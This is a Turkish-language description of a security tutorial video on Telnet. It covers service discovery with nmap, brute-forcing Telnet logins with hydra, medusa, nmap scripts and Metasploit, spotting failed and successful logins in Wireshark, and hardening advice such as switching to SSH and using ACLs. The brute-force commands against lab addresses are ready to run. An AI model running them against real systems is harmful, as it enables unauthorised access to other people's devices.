Telnet Nedir ?
Telnet (Terminal Emulation Protocol) : Bir cihazı uzaktan yönetmek için kullanılan bir protokol dür.
Cilnet-server şeklinde çalışır. TCP/IP protokollerinden birisidir. Telnet varsayılan olarak 23 numaralı portu kullanır, istenirse değiştirile bilir. Veriler şifrelenmez, bundan dolayı güvensiz bir protokoldür.
Ağımızı dinlemek isteyen herhangi biri verilerimizi görebilir.
Telnet Servisi Kontrolü Nasıl Yapılır ?
nmap 192.168.1.67 p
nmap -sS -sV -O -A -sC 192.168.1.67 -p 23
Telnet Servisine Bağlanma (Windows)
Varsayılan olarak kapalı açmamız lazım.
Denetim Masası, Program Kaladır, Windows Ayarları Aç Kapa, Telnet İstemcisine izin ver
CMD : telnet 192.168.1.67
Telnet Servisine Bağlanma (Linux)
telnet 192.168.1.67
Telnet Servisine Kaba Kuvvet Saldırısı
hydra -L /root/Desktop/sözlük.txt -P /root/Desktop/sözlük.txt 192.168.1.67 telnet -I
hydra -L /root/Desktop/sözlük.txt -P /root/Desktop/sözlük.txt 192.168.1.67 -t 16 -e ns telnet -I -vV
hydra -L /root/Desktop/sözlük.txt -P /root/Desktop/sözlük.txt 192.168.1.67 -s 23 -t 16 -e ns telnet -I -vV
nmap --script telnet-brute --script-args userdb=/root/Desktop/sözlük.txt,passdb=/root/Desktop/sözlük.txt -p 23 192.168.1.58
medusa -U /root/Desktop/sözlük.txt -P /root/Desktop/sözlük.txt -h 192.168.1.58 -M telnet
msfconsole, search telnet_lo
Nasıl Analiz Yapılır ?
Bağlanamadığımız zaman "Login incorrect" mesajı dönüyor başka mesajda dönebilir. Telnet clear text bağlantı yaptığı için wireshark her şeyi göre biliyor bizde bu paketler arasında filtreleme yaparak başarısız girişleri tespit edeceğiz
telnet contains "Login incorrect" : Telnet paketlerinin içerisinde arama yapıyor ve "Login incorrect" olanları gösteriyor. Bur da saldırı olup olmadığını ağın büyüklüğüne göre anlarız eğer 2, 3 kişinin bağlandığı bir sistemde az sayıda hatalı giriş varsa sıkıntı yok ama 100'lerce hatalı giriş varsa bu saldırı var demek ola bilir. Büyük bir ağa sahip isek 100 hatalı giriş normaldir buna siz kara vereceksiniz.
telnet contains "No mail." : Başarılı girişle de bu kelimeyi verdiği için bunu aratıyoruz ve başarılı girişleri gösteriyor ve bur da saldırgan ne yapmış anlaya biliyoruz. Pakete tıklayıp Fallow TCP Stream dediğimiz zaman paketleri inceleye biliyoruz
Nasıl Kuruna Biliriz
Telnet yerine SSH kullanılmalı
SSH versiyonu güncel olmalı SSH 2 (DH) gibi
Ağ log ları incelenmeli
ACL (Access Connes List) Oluşturulmalı. Yani sadece belirli ip ye sahip kişilerin sisteme bağlanması sağlanmalı.
00:10 Konu Anlatımı
00:35 Port Keşfi
01:10 Linux Telnet Bağlanma Analiz
02:16 Windows Telnet Bağlanma
02:43 Telnet Saldırı Analiz
06:53 Nmap
07:25 Medusa
07:41 Msfconsole
08:05 Exploit
08:21 Cisco Telnet
08:41 Güvenliği Nasıl Sağlarız
09:00 SON
Abone Ol : https://bit.ly/3uzKdxv
Vuln Hub : https://bit.ly/3JByfIV
Buffer Overflow : https://bit.ly/3tZCPd2
Web Hacking : https://bit.ly/3JtvjOi
Adli Bilişim : https://bit.ly/3Dge28P
Network Hacking : https://bit.ly/3K65Drf
Bilgi Toplama : https://bit.ly/3EtESv1
Şifre Saldırıları : https://bit.ly/3MkRSWe
Eğitim amaçlı siber güvenlik ve hacking ile ilgili videolar paylaşıyorum amacı dışında kullanılması halinde tüm sorumluluk kullanan kişiye aittir.
#hack #security #ccna #telnet #ssh #hydra #kalilinux #wireshark #ethicalhacking